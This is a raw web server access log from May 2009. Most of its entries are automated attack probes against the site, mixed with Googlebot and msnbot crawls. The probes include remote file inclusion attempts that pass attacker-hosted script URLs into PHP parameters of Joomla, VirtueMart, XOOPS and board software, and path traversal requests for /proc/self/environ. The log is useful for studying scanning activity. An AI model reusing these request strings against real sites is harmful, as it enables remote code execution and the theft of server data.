113.29.225.7 - - [13/May/2009:20:07:22 -0500] "GET //include/admin.lib.inc.php?site_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:20:07:22 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
218.185.20.88 - - [13/May/2009:20:07:45 -0500] "GET /logs/access_log.1228608000///?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:20:07:45 -0500] "GET ///?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:20:07:47 -0500] "GET /logs///?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 189323 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:20:09:32 -0500] "GET /logs/access_log.1206921600 HTTP/1.1" 200 1114 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
113.29.225.7 - - [13/May/2009:20:10:08 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:20:10:08 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
62.146.47.98 - - [13/May/2009:20:10:21 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
62.146.47.98 - - [13/May/2009:20:10:21 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
65.98.59.178 - - [13/May/2009:20:12:27 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/yuni212/andri.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
212.72.183.17 - - [13/May/2009:20:12:48 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.72.183.17 - - [13/May/2009:20:12:48 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
217.147.29.190 - - [13/May/2009:20:14:07 -0500] "GET /errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 293 "-""Mozilla/5.0"
217.147.29.190 - - [13/May/2009:20:14:07 -0500] "GET /logs/errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 298 "-""Mozilla/5.0"
217.147.29.190 - - [13/May/2009:20:14:07 -0500] "GET /logs/access_log.1225670400/errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.147.29.190 - - [13/May/2009:20:14:07 -0500] "GET /logs/access_log.1222387200/errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.147.29.190 - - [13/May/2009:20:14:08 -0500] "GET /logs/access_log.1222560000/errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.147.29.190 - - [13/May/2009:20:14:08 -0500] "GET /logs/access_log.1220832000/errors.php?error=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.38.41.79 - - [13/May/2009:20:14:26 -0500] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.centrsoft.ru/logo.jpg?? HTTP/1.1" 404 337 "-""libwww-perl/5.811"
64.38.41.79 - - [13/May/2009:20:14:26 -0500] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.centrsoft.ru/logo.jpg?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
124.0.54.98 - - [13/May/2009:20:14:39 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.54.98 - - [13/May/2009:20:14:39 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.54.98 - - [13/May/2009:20:14:39 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:20:14:49 -0500] "GET /logs/access_log.1210118400 HTTP/1.1" 200 7382 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.1.64.133 - - [13/May/2009:20:17:25 -0500] "GET //index.php?link=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.1.64.133 - - [13/May/2009:20:17:25 -0500] "GET /logs//index.php?link=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.1.64.133 - - [13/May/2009:20:17:25 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.61 (Macintosh; I; PPC)"
218.1.64.133 - - [13/May/2009:20:17:25 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.61 (Macintosh; I; PPC)"
218.1.64.133 - - [13/May/2009:20:17:26 -0500] "GET //index.php?link=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""XXXXXX"
218.1.64.133 - - [13/May/2009:20:17:26 -0500] "GET /logs//index.php?link=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""XXXXXX"
218.1.64.133 - - [13/May/2009:20:17:26 -0500] "GET /logs//index.php?link=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""XXXXXX"
218.185.20.88 - - [13/May/2009:20:17:26 -0500] "GET ///?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:20:17:26 -0500] "GET /logs/access_log.1228608000%20%20///?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.1.64.133 - - [13/May/2009:20:17:27 -0500] "GET //index.php?link=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""XXXXXX"
218.185.20.88 - - [13/May/2009:20:17:28 -0500] "GET /logs///?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 189323 "-""Mozilla/5.0"
82.110.102.244 - - [13/May/2009:20:19:51 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.813"
82.110.102.244 - - [13/May/2009:20:19:51 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.813"
66.249.67.180 - - [13/May/2009:20:20:06 -0500] "GET /logs/access_log.1144454400 HTTP/1.1" 200 933 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.1.64.133 - - [13/May/2009:20:20:21 -0500] "GET /logs/!scan%20plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.1.64.133 - - [13/May/2009:20:20:21 -0500] "GET /!scan%20plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.1.64.133 - - [13/May/2009:20:20:21 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Advanced Browser (http://www.avantbrowser.com)"
218.1.64.133 - - [13/May/2009:20:20:22 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Advanced Browser (http://www.avantbrowser.com)"
218.1.64.133 - - [13/May/2009:20:20:22 -0500] "GET /logs/!scan%20plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 323 "-""XXXXXX"
218.1.64.133 - - [13/May/2009:20:20:22 -0500] "GET /!scan%20plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 318 "-""XXXXXX"
218.1.64.133 - - [13/May/2009:20:20:22 -0500] "GET /logs/!scan%20plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""XXXXXX"
218.1.64.133 - - [13/May/2009:20:20:23 -0500] "GET /!scan%20plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""XXXXXX"
218.185.20.88 - - [13/May/2009:20:23:12 -0500] "GET /logs/access_log.1228608000///?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:20:25:25 -0500] "GET /logs/access_log.1189382400 HTTP/1.1" 200 2497 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.38.41.79 - - [13/May/2009:20:29:56 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.centrsoft.ru/logo.jpg?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
64.38.41.79 - - [13/May/2009:20:29:56 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.centrsoft.ru/logo.jpg?? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
66.249.67.180 - - [13/May/2009:20:30:40 -0500] "GET /logs/access_log.1176768000 HTTP/1.1" 200 2046 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.141 - - [13/May/2009:20:31:22 -0500] "GET /logs/access_log.1175558400 HTTP/1.1" 200 1439 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [13/May/2009:20:31:22 -0500] "GET /logs/access_log.1110672000 HTTP/1.1" 200 330 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
122.153.212.195 - - [13/May/2009:20:33:14 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:20:33:15 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:20:33:17 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
110.45.144.164 - - [13/May/2009:20:33:20 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ekedie.com/files/csgs/secure/abbeymyonlineaccount2/id.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
110.45.144.164 - - [13/May/2009:20:33:20 -0500] "GET /logs/access_log.1238889600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ekedie.com/files/csgs/secure/abbeymyonlineaccount2/id.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
110.45.144.164 - - [13/May/2009:20:33:20 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ekedie.com/files/csgs/secure/abbeymyonlineaccount2/id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
110.45.144.164 - - [13/May/2009:20:33:20 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ekedie.com/files/csgs/secure/abbeymyonlineaccount2/id.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:20:35:57 -0500] "GET /logs/access_log.1189036800 HTTP/1.1" 200 1480 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [13/May/2009:20:41:14 -0500] "GET /logs/access_log.1206316800 HTTP/1.1" 200 787 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.153.212.195 - - [13/May/2009:20:43:08 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:20:43:12 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:20:43:18 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
61.160.201.12 - - [13/May/2009:20:46:29 -0500] "GET /logs/errors.php?error=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.160.201.12 - - [13/May/2009:20:46:29 -0500] "GET /logs/access_log.1234483200/errors.php?error=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.160.201.12 - - [13/May/2009:20:46:32 -0500] "GET /errors.php?error=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.101.159.29 - - [13/May/2009:20:47:22 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://70.38.120.161/~anyhost/wp-content/uploads/chid??? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
121.101.159.29 - - [13/May/2009:20:47:22 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://70.38.120.161/~anyhost/wp-content/uploads/chid??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
61.160.201.12 - - [13/May/2009:20:50:47 -0500] "GET /logs/access_log.1237248000/errors.php?error=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:20:51:51 -0500] "GET /logs/access_log.1115942400 HTTP/1.1" 200 2212 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [13/May/2009:20:57:06 -0500] "GET /logs/access_log.1173744000 HTTP/1.1" 200 3422 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.5 - - [13/May/2009:20:57:27 -0500] "GET /logs/editsite.php?returnpath=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
77.221.130.5 - - [13/May/2009:20:57:27 -0500] "GET /editsite.php?returnpath=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
77.221.130.5 - - [13/May/2009:20:57:27 -0500] "GET /logs/access_log.1240012800/editsite.php?returnpath=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.221.130.5 - - [13/May/2009:20:57:38 -0500] "GET /logs/access_log.1240185600/editsite.php?returnpath=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.55.208.143 - - [13/May/2009:20:58:03 -0500] "GET /logs/access_log.1142726400 HTTP/1.1" 200 963 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:20:58:03 -0500] "GET /logs/access_log.1179619200 HTTP/1.1" 200 459 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:20:58:04 -0500] "GET /logs/access_log.1198022400 HTTP/1.1" 200 527 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:20:58:05 -0500] "GET /logs/access_log.1204329600 HTTP/1.1" 200 1642 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:20:58:06 -0500] "GET /logs/access_log.1205625600 HTTP/1.1" 200 2796 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:20:58:07 -0500] "GET /logs/access_log.1135900800 HTTP/1.1" 200 2494 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:20:58:08 -0500] "GET /logs/access_log.1144195200 HTTP/1.1" 200 4050 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
217.18.76.16 - - [13/May/2009:21:01:20 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:21:01:20 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:21:02:12 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:21:02:12 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:21:02:23 -0500] "GET /logs/access_log.1140566400 HTTP/1.1" 200 1532 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.1.64.133 - - [13/May/2009:21:03:22 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 318 "-""Advanced Browser (http://www.avantbrowser.com)"
218.1.64.133 - - [13/May/2009:21:03:22 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 313 "-""Advanced Browser (http://www.avantbrowser.com)"
218.1.64.133 - - [13/May/2009:21:03:23 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
218.1.64.133 - - [13/May/2009:21:03:23 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
218.1.64.133 - - [13/May/2009:21:03:23 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 313 "-""XXXXXX"
218.1.64.133 - - [13/May/2009:21:03:23 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 318 "-""XXXXXX"
218.1.64.133 - - [13/May/2009:21:03:24 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""XXXXXX"
218.1.64.133 - - [13/May/2009:21:03:24 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""XXXXXX"
87.106.135.14 - - [13/May/2009:21:04:27 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:21:04:27 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:21:06:21 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:21:06:22 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
217.18.76.16 - - [13/May/2009:21:07:15 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:21:07:15 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
211.172.225.50 - - [13/May/2009:21:07:39 -0500] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 404 311 "-""core-project/1.0"
66.249.67.180 - - [13/May/2009:21:07:40 -0500] "GET /logs/access_log.1207958400 HTTP/1.1" 200 3345 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.106.135.14 - - [13/May/2009:21:08:23 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:21:08:23 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
110.45.144.106 - - [13/May/2009:21:10:38 -0500] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
110.45.144.106 - - [13/May/2009:21:10:38 -0500] "GET /logs/access_log.1231027200/vwar/convert/mvcw.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
110.45.144.106 - - [13/May/2009:21:10:38 -0500] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
196.40.83.75 - - [13/May/2009:21:11:59 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cluboftraders.de/impex/kontol.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
196.40.83.75 - - [13/May/2009:21:12:00 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cluboftraders.de/impex/kontol.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
66.249.67.180 - - [13/May/2009:21:12:57 -0500] "GET /logs/access_log.1172793600 HTTP/1.1" 200 47855 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
196.40.83.75 - - [13/May/2009:21:14:10 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cluboftraders.de/impex/kontol.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
196.40.83.75 - - [13/May/2009:21:14:10 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cluboftraders.de/impex/kontol.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
196.40.83.75 - - [13/May/2009:21:14:10 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cluboftraders.de/impex/kontol.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
196.40.83.75 - - [13/May/2009:21:16:28 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cluboftraders.de/impex/kontol.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
195.74.61.78 - - [13/May/2009:21:17:53 -0500] "GET /logs//common/errors.php?error=http://www.cluboftraders.de/impex/kontol.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
195.74.61.78 - - [13/May/2009:21:17:53 -0500] "GET //common/errors.php?error=http://www.cluboftraders.de/impex/kontol.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
